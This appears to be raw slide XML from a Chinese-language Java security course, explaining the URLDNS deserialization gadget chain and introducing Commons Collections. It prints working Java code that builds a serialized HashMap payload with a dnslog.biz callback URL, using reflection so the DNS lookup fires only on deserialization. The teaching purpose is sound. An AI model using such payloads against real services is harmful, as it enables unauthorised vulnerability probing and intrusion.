            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>调用链</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如下：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="205105" y="2151380"/>
            <a:ext cx="5829300" cy="2720340"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329565" y="4961255"/>
            <a:ext cx="11090275" cy="1353185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>也就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HashMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>put</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>方法，对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HashCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>类中正好重写了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HashCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，所以将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>类作为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HashMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>即可，这样在借助</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNSLOG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等平台可以进行反序列化的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>验证。</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257810" y="1217295"/>
            <a:ext cx="11319510" cy="4521835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用代码验证前面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>猜想：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    public static void main(String[] args) throws MalformedURLException {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        HashMap&lt;URL, Integer&gt; urlIntegerHashMap = new HashMap&lt;&gt;();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        URL url = new URL("http://e82253f1.log.dnslog.biz");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        urlIntegerHashMap.put(url,123);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在详细的跟进源码一探</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>究竟。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4135755" y="3423920"/>
            <a:ext cx="6877050" cy="2891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40360" y="1310640"/>
            <a:ext cx="8839200" cy="1539240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="234315" y="2712720"/>
            <a:ext cx="8862060" cy="716280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="287655" y="3429000"/>
            <a:ext cx="8808720" cy="876300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="4078605"/>
            <a:ext cx="3924935" cy="2686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492885" y="3912870"/>
            <a:ext cx="6016625" cy="2585085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1732280" y="1470660"/>
            <a:ext cx="5537835" cy="2150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236855" y="1165225"/>
            <a:ext cx="5575935" cy="5059045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>跟踪完源码之后会有一个疑问，如何在反序列化的时候让目标对象去执行呢？也就是不在序列化阶段执行，而在反序列化的时候让目标对象去执行这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>PalyLoad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。如果细心分析源码就会在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>类的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>hashCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>方法中有一个条件当this.hashCode != -1的时候会返回该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>hashCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>值，不会去实际执行目标对象的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>hashCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，也就是说我们可以在调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>hashMap.put</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>之前将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>hashCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>值改为非</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>hashMap.put</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>之后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>hashCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>值改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，这样就保证了在序列化阶段不去执行而在反序列化阶段去</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>执行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>那么如何做呢？首先看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>类中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>hashCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> private</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>属性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>类型的一个值，所以想要改变其值我们想到的应该是利用反射技术来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实现。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5949315" y="1165225"/>
            <a:ext cx="6151880" cy="2785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软件安全问题产生--软件缺陷普遍存在</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4690" y="1458595"/>
            <a:ext cx="6096000" cy="175323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千行代码缺陷数量</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>普通软件公司：4～40</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>高管理软件公司：2~4</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>美国NASA软件：0.1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="821690" y="3556000"/>
            <a:ext cx="2661285" cy="92202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漏洞数量</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3872865" y="1458595"/>
            <a:ext cx="3047365" cy="2097405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2555240" y="3959860"/>
            <a:ext cx="6503035" cy="2829560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7209790" y="1572260"/>
            <a:ext cx="4141470" cy="1856740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>CMMI全称是Capability Maturity Model Integration，即能力成熟度模型集成（也有称为：软件能力成熟度集成模型）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对企业非</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>个人</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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75260" y="1206500"/>
            <a:ext cx="11697335" cy="5107940"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>最终的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>PalyLoad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>序列化：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>public class DnsUrlT {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    public static void main(String[] args) throws IOException, NoSuchFieldException, IllegalAccessException {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        HashMap&lt;URL, Integer&gt; urlIntegerHashMap = new HashMap&lt;&gt;();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        URL url = new URL("http://c4c2b65d.log.dnslog.biz");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        Class clz = URL.class;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        Field hashCode = clz.getDeclaredField("hashCode");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        hashCode.setAccessible(true);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        hashCode.set(url,111);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        urlIntegerHashMap.put(url,123);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        hashCode.set(url,-1);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        Serialize(urlIntegerHashMap);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    public static void Serialize(Object obj) throws IOException {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("DnsUrl.ser"));</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        objectOutputStream.writeObject(obj);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        objectOutputStream.close();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>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257175" y="1186180"/>
            <a:ext cx="11471910" cy="5128260"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的反序列化：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    public static void main(String[] args) throws Exception{</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        Deserialize();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    private static void Deserialize() throws IOException, ClassNotFoundException {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("DnsUrl.ser"));</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>        objectInputStream.readObject();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7788275" y="3151505"/>
            <a:ext cx="2822575" cy="3090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154305" y="1227455"/>
            <a:ext cx="11708130" cy="5086985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> Commons Collections是什么？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Java Collections Framework 是 JDK 1.2 中的一项重要新增功能。它添加了许多强大的数据结构，可以加速最重要的 Java 应用程序的开发。从那时起，它已成为 Java 中公认的集合处理标准。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Commons-Collections试图通过提供新的接口、实现和实用程序来构建JDK类。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
